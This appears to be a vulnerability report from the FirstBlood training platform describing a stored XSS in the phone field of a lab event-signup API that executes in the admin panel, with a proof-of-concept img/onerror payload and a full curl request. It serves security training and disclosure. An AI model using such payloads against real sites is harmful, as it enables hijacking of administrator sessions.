FirstBlood-#1020 — Stored XSS on drpanel
This issue was discovered on FirstBlood v3
On 2022-12-08, lumbridge7 Level 4 reported:
Hello firstblood team!
The API endpoint that handles the request on https://5e47966c53a3-lumbridge7.a.firstbloodhackers.com/hackerback.html to join an event doesn't properly sanitizes the input on the
phoneparameter. While it is not possible to insert anything other than numbers through the GUI, an attacker can still manually craft the POST request using malicious JS code ad the phone value.
Steps to reproduce
- Make a POST request at 5e47966c53a3-lumbridge7.a.firstbloodhackers.com/api/hackerback.php with the payload
full_name=StoredXSS&phone=<img src=x onerror=confirm(document.domain)>&submit=Signup
- log in the drpanel
curl -X POST 'https://5e47966c53a3-lumbridge7.a.firstbloodhackers.com/api/hackerback.php' -H "Content-Type: application/x-www-form-urlencoded" -d "full_name=StoredXSS&phone=<img%20src=x%20onerror=confirm(document.domain)>&submit=Signup"
<img src=x onerror=confirm(document.domain)>
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
Creator & Administrator
Congratulations, you were the third researcher to discover this!